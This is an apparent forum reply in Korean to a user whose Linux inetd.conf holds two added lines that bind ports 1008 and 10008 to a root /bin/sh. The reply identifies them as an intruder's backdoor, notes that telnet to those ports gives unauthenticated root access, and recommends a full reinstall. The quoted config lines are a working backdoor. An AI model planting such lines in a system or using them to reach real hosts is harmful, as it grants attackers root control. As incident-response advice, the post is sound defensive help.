해킹 당했군요.
다른 컴에서 서버쪽으로
telnet xxx.xxx.xxx.xxx 1008
telnet xxx.xxx.xxx.xxx 10008
이렇게 해보세요.
아무 인증 없이 root 권한으로 로그인 됩니다.
백도어를 설치한거죠..
아래에 여러가지 대처법을 적어 놓으셨는데.
아마 다시 설치 하시는게 더 낳을걸요.
보통 해커들의 특성을 보면 한번 뚤으면 여러군데 백도어를 설치 하죠.
inetd.conf를 수정한건 수많은 백도어중 간단히 설치 할 수 있는 방법이죠.
이름이 생각않나는데 무결성 체크유틸을 따로 사용하지 않았다면 다시 설치 하시는게 낳
을겁니다. 여러가지 방법으로 찾아서 다 막아 놯도 하나만 빼놓아도 헛수고가 되니까요.
그냥 다시 설치 하시고 할수 있는 모든 보안을 적용 하시는게 더낳을겁니다.
그럼 이만...
: 안녕하세요.
:
: 저기 inetd.conf 파일 맨아래에 다음과 같이 나와 있는데 이거
: 해킹당한건가요
:
: linuxconf stream tcp wait root /bin/linuxconf linuxconf --http
: 1008 stream tcp nowait root /bin/sh sh
: 10008 stream tcp nowait root /bin/sh sh
:
: 답변 부탁드립니다.--이 곳에 서명을 적어주십시오.
서명.